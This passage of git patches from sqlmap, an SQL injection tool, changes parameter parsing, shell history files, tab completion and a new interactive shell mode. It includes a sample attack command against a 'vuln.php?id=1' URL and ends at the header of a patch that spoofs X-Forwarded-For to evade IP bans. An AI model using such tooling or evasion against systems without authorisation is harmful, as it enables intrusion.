+        logger.warn(warnMsg)

From 637d3cbaf72c55ff19fb00809fc55ea00fff4695 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 12 Sep 2014 13:29:30 +0200
Subject: [PATCH 020/492] Fix for cases when parameter name is urlencoded

---
 lib/core/agent.py  | 3 +++
 lib/core/common.py | 2 +-
 2 files changed, 4 insertions(+), 1 deletion(-)

diff --git a/lib/core/agent.py b/lib/core/agent.py
index ce78736ee..923677b15 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -19,6 +19,7 @@ from lib.core.common import safeSQLIdentificatorNaming
 from lib.core.common import singleTimeWarnMessage
 from lib.core.common import splitFields
 from lib.core.common import unArrayizeValue
+from lib.core.common import urlencode
 from lib.core.common import zeroDepthSearch
 from lib.core.data import conf
 from lib.core.data import kb
@@ -153,6 +154,8 @@ class Agent(object):
             retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
         else:
             retVal = re.sub(r"(\A|\b)%s=%s" % (re.escape(parameter), re.escape(origValue)), "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
+            if retVal == paramString and urlencode(parameter) != parameter:
+                retVal = re.sub(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
 
         return retVal
 
diff --git a/lib/core/common.py b/lib/core/common.py
index 0ac8eee6b..cbca1080d 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -549,7 +549,7 @@ def paramToDict(place, parameters=None):
         parts = element.split("=")
 
         if len(parts) >= 2:
-            parameter = parts[0].replace(" ", "")
+            parameter = urldecode(parts[0].replace(" ", ""))
 
             if conf.paramDel and conf.paramDel == '\n':
                 parts[-1] = parts[-1].rstrip()

From ffa7e2f6e905a5bd0aeab98b51f512529e5024e0 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 14 Sep 2014 22:57:41 +0200
Subject: [PATCH 021/492] Minor fix

---
 thirdparty/pagerank/pagerank.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/thirdparty/pagerank/pagerank.py b/thirdparty/pagerank/pagerank.py
index 60a654fd1..977a93744 100644
--- a/thirdparty/pagerank/pagerank.py
+++ b/thirdparty/pagerank/pagerank.py
@@ -15,6 +15,7 @@
 import urllib
 
 def get_pagerank(url):
+    url = url.encode('utf8') if isinstance(url, unicode) else url
     _ = 'http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=%s&q=info:%s' % (check_hash(hash_url(url)), urllib.quote(url))
     try:
         f = urllib.urlopen(_)

From 45f55481138344b7be0ea4b722a67c46f773b2e8 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 16 Sep 2014 08:58:25 +0200
Subject: [PATCH 022/492] Minor update regarding shell history file

---
 lib/core/common.py | 5 +++--
 lib/core/shell.py  | 4 ++--
 2 files changed, 5 insertions(+), 4 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index cbca1080d..d22217a17 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1052,12 +1052,13 @@ def setPaths():
     paths.SQLMAP_XML_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "xml")
     paths.SQLMAP_XML_BANNER_PATH = os.path.join(paths.SQLMAP_XML_PATH, "banner")
 
-    paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(os.path.expanduser("~"), ".sqlmap", "output")), system=True)
+    _ = os.path.join(os.path.expanduser("~"), ".sqlmap")
+    paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), system=True)
     paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
     paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")
 
     # sqlmap files
-    paths.SQLMAP_HISTORY = os.path.join(os.path.expanduser('~'), ".sqlmap_history")
+    paths.SQLMAP_SHELL_HISTORY = os.path.join(_, "shell.hst")
     paths.SQLMAP_CONFIG = os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap-%s.conf" % randomStr())
     paths.COMMON_COLUMNS = os.path.join(paths.SQLMAP_TXT_PATH, "common-columns.txt")
     paths.COMMON_TABLES = os.path.join(paths.SQLMAP_TXT_PATH, "common-tables.txt")
diff --git a/lib/core/shell.py b/lib/core/shell.py
index fdf769989..07e3f9243 100644
--- a/lib/core/shell.py
+++ b/lib/core/shell.py
@@ -16,11 +16,11 @@ from lib.core.data import paths
 from lib.core.enums import OS
 
 def saveHistory():
-    historyPath = os.path.expanduser(paths.SQLMAP_HISTORY)
+    historyPath = os.path.expanduser(paths.SQLMAP_SHELL_HISTORY)
     readline.write_history_file(historyPath)
 
 def loadHistory():
-    historyPath = os.path.expanduser(paths.SQLMAP_HISTORY)
+    historyPath = os.path.expanduser(paths.SQLMAP_SHELL_HISTORY)
 
     if os.path.exists(historyPath):
         try:

From 57eb19377edd3b858034ea8bf0b1e5969f77bf2c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 16 Sep 2014 09:07:31 +0200
Subject: [PATCH 023/492] Minor code refactoring

---
 lib/core/enums.py           | 4 ++++
 lib/core/shell.py           | 5 +++--
 lib/takeover/abstraction.py | 3 ++-
 plugins/generic/custom.py   | 3 ++-
 4 files changed, 11 insertions(+), 4 deletions(-)

diff --git a/lib/core/enums.py b/lib/core/enums.py
index c7307c778..095c03b9d 100644
--- a/lib/core/enums.py
+++ b/lib/core/enums.py
@@ -338,3 +338,7 @@ class AUTH_TYPE:
     DIGEST = "digest"
     NTLM = "ntlm"
     PKI = "pki"
+
+class AUTOCOMPLETE_TYPE:
+    SQL = 0
+    OS = 1
diff --git a/lib/core/shell.py b/lib/core/shell.py
index 07e3f9243..2064ece46 100644
--- a/lib/core/shell.py
+++ b/lib/core/shell.py
@@ -13,6 +13,7 @@ from lib.core import readlineng as readline
 from lib.core.common import Backend
 from lib.core.data import logger
 from lib.core.data import paths
+from lib.core.enums import AUTOCOMPLETE_TYPE
 from lib.core.enums import OS
 
 def saveHistory():
@@ -47,13 +48,13 @@ class CompleterNG(rlcompleter.Completer):
 
         return matches
 
-def autoCompletion(sqlShell=False, osShell=False):
+def autoCompletion(completion=None):
     # First of all we check if the readline is available, by default
     # it is not in Python default installation on Windows
     if not readline._readline:
         return
 
-    if osShell:
+    if completion == AUTOCOMPLETE_TYPE.OS:
         if Backend.isOs(OS.WINDOWS):
             # Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands
             completer = CompleterNG({
diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py
index c4773dfd4..030697560 100644
--- a/lib/takeover/abstraction.py
+++ b/lib/takeover/abstraction.py
@@ -13,6 +13,7 @@ from lib.core.common import isStackingAvailable
 from lib.core.common import readInput
 from lib.core.data import conf
 from lib.core.data import logger
+from lib.core.enums import AUTOCOMPLETE_TYPE
 from lib.core.enums import DBMS
 from lib.core.exception import SqlmapFilePathException
 from lib.core.exception import SqlmapUnsupportedFeatureException
@@ -116,7 +117,7 @@ class Abstraction(Web, UDF, Xp_cmdshell):
             infoMsg += "'x' or 'q' and press ENTER"
             logger.info(infoMsg)
 
-        autoCompletion(osShell=True)
+        autoCompletion(AUTOCOMPLETE_TYPE.OS)
 
         while True:
             command = None
diff --git a/plugins/generic/custom.py b/plugins/generic/custom.py
index 1cb83560a..5a64f148f 100644
--- a/plugins/generic/custom.py
+++ b/plugins/generic/custom.py
@@ -15,6 +15,7 @@ from lib.core.convert import utf8decode
 from lib.core.data import conf
 from lib.core.data import logger
 from lib.core.dicts import SQL_STATEMENTS
+from lib.core.enums import AUTOCOMPLETE_TYPE
 from lib.core.settings import NULL
 from lib.core.settings import PARAMETER_SPLITTING_REGEX
 from lib.core.shell import autoCompletion
@@ -73,7 +74,7 @@ class Custom:
         infoMsg += "'x' or 'q' and press ENTER"
         logger.info(infoMsg)
 
-        autoCompletion(sqlShell=True)
+        autoCompletion(AUTOCOMPLETE_TYPE.SQL)
 
         while True:
             query = None

From 7278af01ee18e962adafc43d3f1021bcaf7215a2 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 16 Sep 2014 14:12:43 +0200
Subject: [PATCH 024/492] Implementation for an Issue #832

---
 lib/core/enums.py           |  1 +
 lib/core/exception.py       |  3 ++
 lib/core/settings.py        |  4 ++
 lib/core/shell.py           | 43 +++++++++++++++++---
 lib/parse/cmdline.py        | 78 +++++++++++++++++++++++++++++++------
 lib/takeover/abstraction.py |  3 +-
 sqlmap.py                   | 12 +++++-
 7 files changed, 124 insertions(+), 20 deletions(-)

diff --git a/lib/core/enums.py b/lib/core/enums.py
index 095c03b9d..b4f8b809f 100644
--- a/lib/core/enums.py
+++ b/lib/core/enums.py
@@ -342,3 +342,4 @@ class AUTH_TYPE:
 class AUTOCOMPLETE_TYPE:
     SQL = 0
     OS = 1
+    SQLMAP = 2
diff --git a/lib/core/exception.py b/lib/core/exception.py
index eb2a6e297..8fe6a7756 100644
--- a/lib/core/exception.py
+++ b/lib/core/exception.py
@@ -44,6 +44,9 @@ class SqlmapSilentQuitException(SqlmapBaseException):
 class SqlmapUserQuitException(SqlmapBaseException):
     pass
 
+class SqlmapShellQuitException(SqlmapBaseException):
+    pass
+
 class SqlmapSyntaxException(SqlmapBaseException):
     pass
 
diff --git a/lib/core/settings.py b/lib/core/settings.py
index aaca12a20..4a93fdfa5 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -239,6 +239,7 @@ BASIC_HELP_ITEMS = (
                         "checkTor",
                         "flushSession",
                         "tor",
+                        "sqlmapShell",
                         "wizard",
                    )
 
@@ -583,6 +584,9 @@ MIN_BINARY_DISK_DUMP_SIZE = 100
 # Regular expression used for extracting form tags
 FORM_SEARCH_REGEX = r"(?si)<form(?!.+<form).+?</form>"
 
+# Maximum number of lines to save in history file
+MAX_HISTORY_LENGTH = 1000
+
 # Minimum field entry length needed for encoded content (hex, base64,...) check
 MIN_ENCODED_LEN_CHECK = 5
 
diff --git a/lib/core/shell.py b/lib/core/shell.py
index 2064ece46..17e340036 100644
--- a/lib/core/shell.py
+++ b/lib/core/shell.py
@@ -15,12 +15,39 @@ from lib.core.data import logger
 from lib.core.data import paths
 from lib.core.enums import AUTOCOMPLETE_TYPE
 from lib.core.enums import OS
+from lib.core.settings import MAX_HISTORY_LENGTH
+
+def readlineAvailable():
+    """
+    Check if the readline is available. By default
+    it is not in Python default installation on Windows
+    """
+
+    return readline._readline is not None
+
+def clearHistory():
+    if not readlineAvailable():
+        return
+
+    readline.clear_history()
 
 def saveHistory():
+    if not readlineAvailable():
+        return
+
     historyPath = os.path.expanduser(paths.SQLMAP_SHELL_HISTORY)
+    try:
+        os.remove(historyPath)
+    except:
+        pass
+
+    readline.set_history_length(MAX_HISTORY_LENGTH)
     readline.write_history_file(historyPath)
 
 def loadHistory():
+    if not readlineAvailable():
+        return
+
     historyPath = os.path.expanduser(paths.SQLMAP_SHELL_HISTORY)
 
     if os.path.exists(historyPath):
@@ -47,15 +74,13 @@ class CompleterNG(rlcompleter.Completer):
                     matches.append(word)
 
         return matches
-
-def autoCompletion(completion=None):
-    # First of all we check if the readline is available, by default
-    # it is not in Python default installation on Windows
-    if not readline._readline:
+        
+def autoCompletion(completion=None, os=None, commands=None):
+    if not readlineAvailable():
         return
 
     if completion == AUTOCOMPLETE_TYPE.OS:
-        if Backend.isOs(OS.WINDOWS):
+        if os == OS.WINDOWS:
             # Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands
             completer = CompleterNG({
                                       "copy": None, "del": None, "dir": None,
@@ -76,5 +101,11 @@ def autoCompletion(completion=None):
         readline.set_completer(completer.complete)
         readline.parse_and_bind("tab: complete")
 
+    elif commands:
+        completer = CompleterNG(dict(((_, None) for _ in commands)))
+        readline.set_completer_delims(' ')
+        readline.set_completer(completer.complete)
+        readline.parse_and_bind("tab: complete")
+
     loadHistory()
     atexit.register(saveHistory)
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index ead78b126..6a7777023 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -6,6 +6,7 @@ See the file 'doc/COPYING' for copying permission
 """
 
 import os
+import shlex
 import sys
 
 from optparse import OptionError
@@ -17,13 +18,21 @@ from lib.core.common import checkDeprecatedOptions
 from lib.core.common import checkSystemEncoding
 from lib.core.common import expandMnemonics
 from lib.core.common import getUnicode
+from lib.core.data import cmdLineOptions
+from lib.core.data import conf
 from lib.core.data import logger
 from lib.core.defaults import defaults
+from lib.core.enums import AUTOCOMPLETE_TYPE
+from lib.core.exception import SqlmapShellQuitException
 from lib.core.settings import BASIC_HELP_ITEMS
 from lib.core.settings import DUMMY_URL
 from lib.core.settings import IS_WIN
 from lib.core.settings import MAX_HELP_OPTION_LENGTH
 from lib.core.settings import VERSION_STRING
+from lib.core.shell import autoCompletion
+from lib.core.shell import clearHistory
+from lib.core.shell import loadHistory
+from lib.core.shell import saveHistory
 
 def cmdLineParser():
     """
@@ -693,6 +702,9 @@ def cmdLineParser():
                                   action="store_true",
                                   help="Conduct through tests only if positive heuristic(s)")
 
+        miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true",
+                            help="Prompt for an interactive sqlmap shell")
+
         miscellaneous.add_option("--wizard", dest="wizard",
                                   action="store_true",
                                   help="Simple wizard interface for beginner users")
@@ -765,22 +777,25 @@ def cmdLineParser():
         option = parser.get_option("-h")
         option.help = option.help.capitalize().replace("this help", "basic help")
 
-        args = []
+        argv = []
+        prompt = False
         advancedHelp = True
 
         for arg in sys.argv:
-            args.append(getUnicode(arg, system=True))
+            argv.append(getUnicode(arg, system=True))
 
-        checkDeprecatedOptions(args)
+        checkDeprecatedOptions(argv)
 
         # Hide non-basic options in basic help case
         for i in xrange(len(sys.argv)):
-            if sys.argv[i] == '-hh':
-                sys.argv[i] = '-h'
-            elif sys.argv[i] == '--version':
+            if sys.argv[i] == "-hh":
+                sys.argv[i] = "-h"
+            elif sys.argv[i] == "--version":
                 print VERSION_STRING
                 raise SystemExit
-            elif sys.argv[i] == '-h':
+            elif sys.argv[i] == "--sqlmap-shell":
+                prompt = True
+            elif sys.argv[i] == "-h":
                 advancedHelp = False
                 for group in parser.option_groups[:]:
                     found = False
@@ -792,17 +807,56 @@ def cmdLineParser():
                     if not found:
                         parser.option_groups.remove(group)
 
+        if prompt:
+            cmdLineOptions.sqlmapShell = True
+
+            _ = ["x", "q", "exit", "quit", "clear"]
+            for group in parser.option_groups:
+                for option in group.option_list:
+                    _.extend(option._long_opts)
+                    _.extend(option._short_opts)
+
+            autoCompletion(AUTOCOMPLETE_TYPE.SQLMAP, commands=_)
+
+            while True:
+                command = None
+
+                try:
+                    command = raw_input("sqlmap-shell> ").strip()
+                except (KeyboardInterrupt, EOFError):
+                    print
+                    raise SqlmapShellQuitException
+
+                if not command:
+                    continue
+                elif command.lower() == "clear":
+                    clearHistory()                    
+                    print "[i] history cleared"
+                    saveHistory()
+                elif command.lower() in ("x", "q", "exit", "quit"):
+                    raise SqlmapShellQuitException
+                elif command[0] != '-':
+                    print "[!] invalid option(s) provided"
+                    print "[i] proper example: '-u http://www.site.com/vuln.php?id=1 --banner'"
+                else:
+                    saveHistory()
+                    loadHistory()
+                    break
+
+            for arg in shlex.split(command):
+                argv.append(getUnicode(arg, system=True))
+
         try:
-            (args, _) = parser.parse_args(args)
+            (args, _) = parser.parse_args(argv)
         except SystemExit:
-            if '-h' in sys.argv and not advancedHelp:
+            if "-h" in sys.argv and not advancedHelp:
                 print "\n[!] to see full list of options run with '-hh'"
             raise
 
         # Expand given mnemonic options (e.g. -z "ign,flu,bat")
-        for i in xrange(len(sys.argv) - 1):
-            if sys.argv[i] == '-z':
-                expandMnemonics(sys.argv[i + 1], parser, args)
+        for i in xrange(len(argv) - 1):
+            if argv[i] == "-z":
+                expandMnemonics(argv[i + 1], parser, args)
 
         if args.dummy:
             args.url = args.url or DUMMY_URL
diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py
index 030697560..4f51616e2 100644
--- a/lib/takeover/abstraction.py
+++ b/lib/takeover/abstraction.py
@@ -15,6 +15,7 @@ from lib.core.data import conf
 from lib.core.data import logger
 from lib.core.enums import AUTOCOMPLETE_TYPE
 from lib.core.enums import DBMS
+from lib.core.enums import OS
 from lib.core.exception import SqlmapFilePathException
 from lib.core.exception import SqlmapUnsupportedFeatureException
 from lib.core.shell import autoCompletion
@@ -117,7 +118,7 @@ class Abstraction(Web, UDF, Xp_cmdshell):
             infoMsg += "'x' or 'q' and press ENTER"
             logger.info(infoMsg)
 
-        autoCompletion(AUTOCOMPLETE_TYPE.OS)
+        autoCompletion(AUTOCOMPLETE_TYPE.OS, OS.WINDOWS if Backend.isOs(OS.WINDOWS) else OS.LINUX)
 
         while True:
             command = None
diff --git a/sqlmap.py b/sqlmap.py
index 5a889d5f9..bb68597e5 100755
--- a/sqlmap.py
+++ b/sqlmap.py
@@ -33,6 +33,7 @@ from lib.core.data import logger
 from lib.core.data import paths
 from lib.core.common import unhandledExceptionMessage
 from lib.core.exception import SqlmapBaseException
+from lib.core.exception import SqlmapShellQuitException
 from lib.core.exception import SqlmapSilentQuitException
 from lib.core.exception import SqlmapUserQuitException
 from lib.core.option import initOptions
@@ -101,7 +102,10 @@ def main():
     except (SqlmapSilentQuitException, bdb.BdbQuit):
         pass
 
-    except SqlmapBaseException, ex:
+    except SqlmapShellQuitException:
+        cmdLineOptions.sqlmapShell = False
+
+    except SqlmapBaseException as ex:
         errMsg = getUnicode(ex.message)
         logger.critical(errMsg)
         sys.exit(1)
@@ -138,6 +142,12 @@ def main():
             except KeyboardInterrupt:
                 pass
 
+        if cmdLineOptions.get("sqlmapShell"):
+            cmdLineOptions.clear()
+            conf.clear()
+            kb.clear()
+            main()
+
         if hasattr(conf, "api"):
             try:
                 conf.database_cursor.disconnect()

From 5b0732e9f919a2b7d6f34b2aa3ddaddd4dfe46e1 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 16 Sep 2014 15:17:50 +0200
Subject: [PATCH 025/492] Minor update for Issue #832

---
 lib/core/common.py   |  4 +++-
 lib/core/shell.py    | 28 +++++++++++++++++++++-------
 lib/parse/cmdline.py |  6 +++---
 3 files changed, 27 insertions(+), 11 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index d22217a17..e99dfa63d 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1058,7 +1058,9 @@ def setPaths():
     paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")
 
     # sqlmap files
-    paths.SQLMAP_SHELL_HISTORY = os.path.join(_, "shell.hst")
+    paths.SQL_SHELL_HISTORY = os.path.join(_, "sql.hst")
+    paths.OS_SHELL_HISTORY = os.path.join(_, "os.hst")
+    paths.SQLMAP_SHELL_HISTORY = os.path.join(_, "sqlmap.hst")
     paths.SQLMAP_CONFIG = os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap-%s.conf" % randomStr())
     paths.COMMON_COLUMNS = os.path.join(paths.SQLMAP_TXT_PATH, "common-columns.txt")
     paths.COMMON_TABLES = os.path.join(paths.SQLMAP_TXT_PATH, "common-tables.txt")
diff --git a/lib/core/shell.py b/lib/core/shell.py
index 17e340036..4cb05cdd2 100644
--- a/lib/core/shell.py
+++ b/lib/core/shell.py
@@ -31,24 +31,38 @@ def clearHistory():
 
     readline.clear_history()
 
-def saveHistory():
+def saveHistory(completion=None):
     if not readlineAvailable():
         return
 
-    historyPath = os.path.expanduser(paths.SQLMAP_SHELL_HISTORY)
+    if completion == AUTOCOMPLETE_TYPE.SQL:
+        historyPath = paths.SQL_SHELL_HISTORY
+    elif completion == AUTOCOMPLETE_TYPE.OS:
+        historyPath = paths.OS_SHELL_HISTORY
+    else:
+        historyPath = paths.SQLMAP_SHELL_HISTORY
+
     try:
-        os.remove(historyPath)
+        with open(historyPath, "rw+") as f:
+            f.truncate()
     except:
         pass
 
     readline.set_history_length(MAX_HISTORY_LENGTH)
     readline.write_history_file(historyPath)
 
-def loadHistory():
+def loadHistory(completion=None):
     if not readlineAvailable():
         return
 
-    historyPath = os.path.expanduser(paths.SQLMAP_SHELL_HISTORY)
+    clearHistory()
+
+    if completion == AUTOCOMPLETE_TYPE.SQL:
+        historyPath = paths.SQL_SHELL_HISTORY
+    elif completion == AUTOCOMPLETE_TYPE.OS:
+        historyPath = paths.OS_SHELL_HISTORY
+    else:
+        historyPath = paths.SQLMAP_SHELL_HISTORY
 
     if os.path.exists(historyPath):
         try:
@@ -107,5 +121,5 @@ def autoCompletion(completion=None, os=None, commands=None):
         readline.set_completer(completer.complete)
         readline.parse_and_bind("tab: complete")
 
-    loadHistory()
-    atexit.register(saveHistory)
+    loadHistory(completion)
+    atexit.register(saveHistory, completion)
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 6a7777023..b39f7ff40 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -832,15 +832,15 @@ def cmdLineParser():
                 elif command.lower() == "clear":
                     clearHistory()                    
                     print "[i] history cleared"
-                    saveHistory()
+                    saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)
                 elif command.lower() in ("x", "q", "exit", "quit"):
                     raise SqlmapShellQuitException
                 elif command[0] != '-':
                     print "[!] invalid option(s) provided"
                     print "[i] proper example: '-u http://www.site.com/vuln.php?id=1 --banner'"
                 else:
-                    saveHistory()
-                    loadHistory()
+                    saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)
+                    loadHistory(AUTOCOMPLETE_TYPE.SQLMAP)
                     break
 
             for arg in shlex.split(command):

From c5294f2cbb0797ac478c45ddadffb3dfc376bd0c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 16 Sep 2014 16:18:13 +0200
Subject: [PATCH 026/492] Minor patch for an Issue #832

---
 lib/parse/cmdline.py | 47 ++++++++++++++++++++++++--------------------
 1 file changed, 26 insertions(+), 21 deletions(-)

diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index b39f7ff40..2c62b94d5 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -786,31 +786,17 @@ def cmdLineParser():
 
         checkDeprecatedOptions(argv)
 
-        # Hide non-basic options in basic help case
-        for i in xrange(len(sys.argv)):
-            if sys.argv[i] == "-hh":
-                sys.argv[i] = "-h"
-            elif sys.argv[i] == "--version":
-                print VERSION_STRING
-                raise SystemExit
-            elif sys.argv[i] == "--sqlmap-shell":
-                prompt = True
-            elif sys.argv[i] == "-h":
-                advancedHelp = False
-                for group in parser.option_groups[:]:
-                    found = False
-                    for option in group.option_list:
-                        if option.dest not in BASIC_HELP_ITEMS:
-                            option.help = SUPPRESS_HELP
-                        else:
-                            found = True
-                    if not found:
-                        parser.option_groups.remove(group)
+        prompt = "--sqlmap-shell" in argv
 
         if prompt:
             cmdLineOptions.sqlmapShell = True
 
             _ = ["x", "q", "exit", "quit", "clear"]
+
+            for option in parser.option_list:
+                _.extend(option._long_opts)
+                _.extend(option._short_opts)
+
             for group in parser.option_groups:
                 for option in group.option_list:
                     _.extend(option._long_opts)
@@ -846,10 +832,29 @@ def cmdLineParser():
             for arg in shlex.split(command):
                 argv.append(getUnicode(arg, system=True))
 
+        # Hide non-basic options in basic help case
+        for i in xrange(len(argv)):
+            if argv[i] == "-hh":
+                argv[i] = "-h"
+            elif argv[i] == "--version":
+                print VERSION_STRING
+                raise SystemExit
+            elif argv[i] == "-h":
+                advancedHelp = False
+                for group in parser.option_groups[:]:
+                    found = False
+                    for option in group.option_list:
+                        if option.dest not in BASIC_HELP_ITEMS:
+                            option.help = SUPPRESS_HELP
+                        else:
+                            found = True
+                    if not found:
+                        parser.option_groups.remove(group)
+
         try:
             (args, _) = parser.parse_args(argv)
         except SystemExit:
-            if "-h" in sys.argv and not advancedHelp:
+            if "-h" in argv and not advancedHelp:
                 print "\n[!] to see full list of options run with '-hh'"
             raise
 

From 0e8090381caafccbeee9a38afab8d36feb3f07bc Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 16 Sep 2014 16:21:29 +0200
Subject: [PATCH 027/492] Minor cosmetic update

---
 lib/parse/cmdline.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 2c62b94d5..5232bec76 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -789,6 +789,7 @@ def cmdLineParser():
         prompt = "--sqlmap-shell" in argv
 
         if prompt:
+            parser.usage = ""
             cmdLineOptions.sqlmapShell = True
 
             _ = ["x", "q", "exit", "quit", "clear"]

From 8a92dd3aaa180653751267bc1f9c4cbde104bc9e Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 16 Sep 2014 16:28:38 +0200
Subject: [PATCH 028/492] Minor cosmetic patch

---
 sqlmap.py | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/sqlmap.py b/sqlmap.py
index bb68597e5..1607a0648 100755
--- a/sqlmap.py
+++ b/sqlmap.py
@@ -81,6 +81,7 @@ def main():
 
         banner()
 
+        conf.showTime = True
         dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True)
         dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True)
 
@@ -131,7 +132,8 @@ def main():
         dataToStdout(setColor(traceback.format_exc()))
 
     finally:
-        dataToStdout("\n[*] shutting down at %s\n\n" % time.strftime("%X"), forceOutput=True)
+        if conf.get("showTime"):
+            dataToStdout("\n[*] shutting down at %s\n\n" % time.strftime("%X"), forceOutput=True)
 
         kb.threadContinue = False
         kb.threadException = True

From 6888d2fc34a05f14f45096132128965503f1ed42 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 16 Sep 2014 16:32:54 +0200
Subject: [PATCH 029/492] Minor cosmetic update

---
 lib/parse/cmdline.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 5232bec76..b2d736afe 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -838,7 +838,7 @@ def cmdLineParser():
             if argv[i] == "-hh":
                 argv[i] = "-h"
             elif argv[i] == "--version":
-                print VERSION_STRING
+                print VERSION_STRING.split('/')[-1]
                 raise SystemExit
             elif argv[i] == "-h":
                 advancedHelp = False

From bbc6dd9ac8c332b418a3bbd689dc5a9b15387002 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 17 Sep 2014 10:28:18 +0200
Subject: [PATCH 030/492] Minor fix

---
 lib/core/shell.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/shell.py b/lib/core/shell.py
index 4cb05cdd2..d1f1f1dca 100644
--- a/lib/core/shell.py
+++ b/lib/core/shell.py
@@ -43,7 +43,7 @@ def saveHistory(completion=None):
         historyPath = paths.SQLMAP_SHELL_HISTORY
 
     try:
-        with open(historyPath, "rw+") as f:
+        with open(historyPath, "w+") as f:
             f.truncate()
     except:
         pass

From 09064a4a24d96eda3595e649b40c7c2837d48174 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 17 Sep 2014 18:25:24 +0200
Subject: [PATCH 031/492] Minor just in case patch

---
 lib/core/shell.py | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/lib/core/shell.py b/lib/core/shell.py
index d1f1f1dca..5653819d2 100644
--- a/lib/core/shell.py
+++ b/lib/core/shell.py
@@ -49,7 +49,11 @@ def saveHistory(completion=None):
         pass
 
     readline.set_history_length(MAX_HISTORY_LENGTH)
-    readline.write_history_file(historyPath)
+    try:
+        readline.write_history_file(historyPath)
+    except IOError, msg:
+        warnMsg = "there was a problem writing the history file '%s' (%s)" % (historyPath, msg)
+        logger.warn(warnMsg)
 
 def loadHistory(completion=None):
     if not readlineAvailable():

From 69701ba08c8874934f6dc20c1d78030735442450 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 17 Sep 2014 18:29:01 +0200
Subject: [PATCH 032/492] Minor refactoring

---
 lib/core/shell.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/shell.py b/lib/core/shell.py
index 5653819d2..aeeea9e1f 100644
--- a/lib/core/shell.py
+++ b/lib/core/shell.py
@@ -44,7 +44,7 @@ def saveHistory(completion=None):
 
     try:
         with open(historyPath, "w+") as f:
-            f.truncate()
+            pass
     except:
         pass
 

From d34a57041e4a9058ff886431cd54e9d2c17ec468 Mon Sep 17 00:00:00 2001
From: Mehmet INCE <mehmet@mehmetince.net>
Date: Fri, 19 Sep 2014 20:59:33 +0300
Subject: [PATCH 033/492] Add random X-Forwarded-For to bypass IP Ban.

---
 tamper/randomfakeproxy.py | 40 +++++++++++++++++++++++++++++++++++++++
 1 file changed, 40 insertions(+)
